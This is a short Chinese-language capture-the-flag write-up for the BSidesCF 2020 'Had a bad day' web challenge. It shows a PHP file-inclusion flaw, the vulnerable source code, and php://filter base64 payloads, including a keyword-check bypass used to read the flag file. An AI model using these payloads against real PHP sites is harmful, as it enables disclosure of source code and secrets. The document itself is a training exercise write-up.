BUU-WEB-[BSidesCF 2020]Had a bad day

Posted 2021-05-20 TzZzEZ-web

[BSidesCF 2020]Had a bad day

随便访问一下，发现url中存在注入。

初步猜测是文件包含漏洞，于是尝试直接读取index的源码。
利用php://filter的伪协议进行读取base64编码。
构建的payload为：

/index.php?category=php://filter/convert.base64-encode/resource=index.php

报错了。（不应该呀，没毛病啊，百度一下看了一下大佬们的姿势，发现是index，不是index.php，拉胯了）

这就可以读取主页的base64编码了。
解码一下：
（只保留了php代码部分）

<?php
	$file = $_GET['category'];

	if(isset($file))
	{
		if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
		include ($file . '.php');
		}
	else{
		echo "Sorry, we currently only support woofers and meowers.";
		}
	}
?>

php审计一下：
以get方式传入参数category。
catgory中必须包含：woofers,meowers或者index中的一种。
尝试借助index读取flag页面的源码。
构建payload：

?category=php://filter/convert.base64-encode/index/resource=flag

成功拿到flag。